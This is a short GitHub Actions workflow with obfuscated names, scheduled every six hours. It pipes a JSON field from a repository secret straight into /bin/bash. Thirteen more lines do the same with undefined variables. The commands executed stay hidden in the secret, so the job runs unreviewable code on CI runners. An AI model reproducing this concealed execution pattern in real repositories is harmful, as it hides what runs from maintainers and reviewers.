name: luyuhuan4567

on:
  workflow_dispatch:
  schedule:
    - cron: '32 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luyuhuan4567
        env:
          tfcgl4: ${{ secrets.tfcgl4 }}
        run: |
          echo $tfcgl4 | jq -r .cjn8430 | /bin/bash
          echo $ggtpi07 | jq -r .q7 | /bin/bash
          echo $nhq99017 | jq -r .x4 | /bin/bash
          echo $tb846 | jq -r .e3091 | /bin/bash
          echo $lnac82044 | jq -r .osz71386 | /bin/bash
          echo $as52 | jq -r .so6669 | /bin/bash
          echo $uutd98 | jq -r .etfs97151 | /bin/bash
          echo $lxpio3 | jq -r .ihswd4506 | /bin/bash
          echo $ojyx990 | jq -r .aocd2 | /bin/bash
          echo $byu6327 | jq -r .qff917 | /bin/bash
          echo $ty37004 | jq -r .hjus5 | /bin/bash
          echo $be55 | jq -r .mmin0851 | /bin/bash
          echo $ko104 | jq -r .et81 | /bin/bash
          echo $t84 | jq -r .ww1 | /bin/bash

